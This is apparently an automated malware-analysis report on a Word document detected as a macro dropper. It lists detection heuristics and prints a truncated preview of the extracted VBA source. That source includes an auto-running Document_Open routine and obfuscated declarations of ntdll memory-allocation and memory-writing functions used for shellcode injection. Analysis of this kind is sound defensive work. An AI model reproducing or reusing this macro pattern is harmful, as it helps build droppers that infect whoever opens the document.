Malware Insights
The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Agent-6369142-0', indicating it functions as a dropper. The presence of a 'Document_Open' VBA macro strongly suggests that the malicious payload is executed automatically upon opening the document. While the VBA code is truncated, the declared functions like 'NtAllocateVirtualMemory' and 'NtWriteVirtualMemory' from 'ntdll.dll' point towards memory manipulation, a common technique for loading and executing shellcode or second-stage malware. The overall intent appears to be the execution of a malicious payload, likely downloaded from an external source, making it a spearphishing attachment.
Heuristics 4
-
ClamAV: Doc.Dropper.Agent-6369142-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6369142-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 35330 bytes |
SHA-256: 60e7549cf0e951de730826400a2ef45083bd8e1432527a51ca071ce5632e2296 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim newspaper As Integer
Dim chignon As Variant
groundnut = "solicitor"
apollons.oriya
kishke = 90 + 4
Pmt 0, kishke, 16112, 47021, 6
End Sub
Attribute VB_Name = "cassiope"
#If (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then
' Ich warte hier
' Doch ich weiГџ dass es dich gibt
Public Declare Function roundsman Lib "Shlwapi.dll " Alias "SleepConditionVariableSRW" (ByVal cic As Any, combative As Any, bourgogne As Any, headsup As Any) As Long
' He comes to me every night
' Ich warte hier
Public Declare Function interception Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal bookish As Any, blister As Any, passionqueller As Any, mucoid As Any) As Long
' With his hands around my neck
' Sometimes love seems so far
Public Declare Function peerage _
Lib "ntdll " Alias _
"NtAllocateVirtualMemory" (truncated As Long, maestoso As Long, ByVal freudian As Long, highmindedByVal As Long, await As Long, ByVal energy As Long) As Long
' irgendwer mich liebt
' Die Nacht Г¶ffnet ihren SchoГџ
Public Declare Function medley _
Lib "ntdll " Alias _
"NtWriteVirtualMemory" (ByVal timeswitch As Any, ByVal veal As Any, ByVal lysimachus As Any, ByVal heraldic As Any, ByVal myctophidae As Any) As Long
' Die Nacht Г¶ffnet ihren SchoГџ
' Die Nacht Г¶ffnet ihren SchoГџ
Public Declare Function unfathomable Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (discountenance As Any, ByVal calcine As Any, ByVal gymnura As Any, ByVal forthcoming As Any, ByVal antigropelos As Any, ByVal reestate As Any, ByVal revendicate As Any) As Long
' Die Nacht Г¶ffnet ihren SchoГџ
' Dont die before I do
#End If
' In my dreams he does exist
' Sometimes love seems so far
#If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then
' His passion is a kiss
' Ich warte hier
Public Declare PtrSafe Function dysmenorrhea Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal barrage As Any, aphonia As Any, empress As Any, celtis As Any) As LongPtr
' I know that you exist
' I dont know who he is
Public Declare PtrSafe Function medley _
Lib "ntdll " Alias _
"NtWriteVirtualMemory" (ByVal flagellate As Any, ByVal epiphytic As Any, ByVal paleozoology As Any, ByVal clipboard As Any, ByVal bahamian As Any) As LongPtr
' I dont know who you are
' Sometimes love seems so far
Public Declare PtrSafe Function peerage _
Lib "ntdll " Alias _
"NtAllocateVirtualMemory" (drown As LongPtr, marriageability As LongPtr, ByVal bloodlessly As LongPtr, applicationsByVal As LongPtr, atrophic As LongPtr, ByVal ichthyolatry As LongPtr) As LongPtr
' Ich weiAY dass irgendwann
' Dont die before I do
Public Declare PtrSafe Function kris Lib "Shlwapi.dll " Alias "SleepConditionVariableSRW" (ByVal formerly As Any, shoddily As Any, avibus As Any, kalotermitidae As Any) As LongPtr
' Ich warte hier
' irgendwer mich liebt
Public Declare PtrSafe Function unfathomable Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (affenpinscher As Any, ByVal unshaped As Any, ByVal borate As Any, ByVal bumpiness As Any, ByVal compages As Any, ByVal cello As Any, ByVal spergula As Any) As Long
' Doch ich weiAY dass es dich gibt
' Ich warte hier
#End If
Attribute VB_Name = "unobtrusive"
Attribute VB_Base = "0{F89CB859-E800-4982-91EA-E22374C77730}{49DE4848-A0DA-4E26-9BC2-07C4D593AA63}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "apollons"
Function gayety(unresolved, gingle, airmail)
#If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (Win64) Then
Dim dolabriform As Byte
Dim feels As Variant
Dim mayaca
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.